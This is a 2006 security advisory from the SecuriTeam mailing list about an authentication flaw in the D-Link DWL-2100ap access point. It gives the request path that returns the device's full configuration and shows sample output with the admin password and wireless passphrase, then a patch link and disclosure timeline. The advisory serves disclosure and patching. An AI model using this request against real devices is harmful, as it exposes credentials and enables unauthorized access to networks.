[NEWS] D-Link DWL-2100ap Information Disclosure



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



D-Link DWL-2100ap Information Disclosure
------------------------------------------------------------------------


SUMMARY

D-Link AirPlus Xtreme GTM series of high-speed devices now capable of
delivering transfer rates up to 15x faster than the standard 802.11b with
the new D-Link 108G.

Improper authentication validation allows attackers to retrieve
information from a D-Link Wireless Access-Point DWL-2100ap.

DETAILS

Usually by making an HTTP request to the /cgi-bin/ directory, the Web
server will return error 404 (Page not found).
By Making an HTTP request to the /cgi-bin/AnyFile.htm file, the Web server
will return error 404 (Page not found).
However, by making an HTTP request to any file in /cgi-bin/ directory with
the extension of .cfg will return all the device configuration.

Example:
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

Will return:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.

D-Link DWL-2100ap Access Point does not allow users to disable the Web
server, or even have an options to filter open ports.

Vendor Status:
Upgrade the firmware of D-Link DWL-2100ap Access Point:
<http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp> http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp

Disclosure Timeline:
11/02/2006 - Vulnerability discovered during a Pen-Test.
15/02/2006 - D-Link World Wide Team Contacted.
17/02/2006 - No response.
18/02/2006 - D-Link World Wide Team re-contacted.
24/02/2006 - No response.
25/02/2006 - D-Link World Wide Team last try of contact.
29/02/2006 - No response.
29/02/2006 - D-Link Brazil Team Contacted.
02/03/2006 - No response.
03/03/2006 - D-Link Brazil Team re-contacted.
06/03/2006 - D-Link Brazil Team responded.
09/03/2006 - Patch created.
14/03/2006 - Patch added to D-Link Brazil download site.
06/06/2006 - published advisory.


ADDITIONAL INFORMATION

The information has been provided by
<mailto:news@xxxxxxxxxxxxxxxxxxxxxxxxx> INTRUDERS TIGER TEAM.
The original article can be found at:
<http://www.intruders.org.br/adv0206en.html>
http://www.intruders.org.br/adv0206en.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [EXPL] D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... D-Link DWL-G132 Wireless Driver Beacon Rates Overflow ... A5AGU.SYS that is vulnerable to a stack-based buffer overflow. ...
    (Securiteam)
  • [UNIX] Dreambox DM500 Webserver Long URL Request Denial of Service
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... An attacker is able to send a very long http request string (approx. ... 2008/05/22 Another response by Nils Weiberg that the research is ongoing ...
    (Securiteam)
  • [NEWS] D-Link Fragmented UDP Denial of Service Vulnerability
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... D-Link Fragmented UDP Denial of Service Vulnerability ... D-Link DI-604 Ethernet Broadband Router ... All packets must have the same Identification Number in the IP Header. ...
    (Securiteam)
  • [NEWS] D-Link Router UPNP Stack Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A remote stack overflow exists in a range of wired and wireless D-Link ... This vulnerability allows an attacker to execute privileged code ...
    (Securiteam)
  • [NEWS] D-Link DSL-G604T Wireless Router Directory Traversal
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... D-Link DSL-G604T Wireless Router Directory Traversal ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)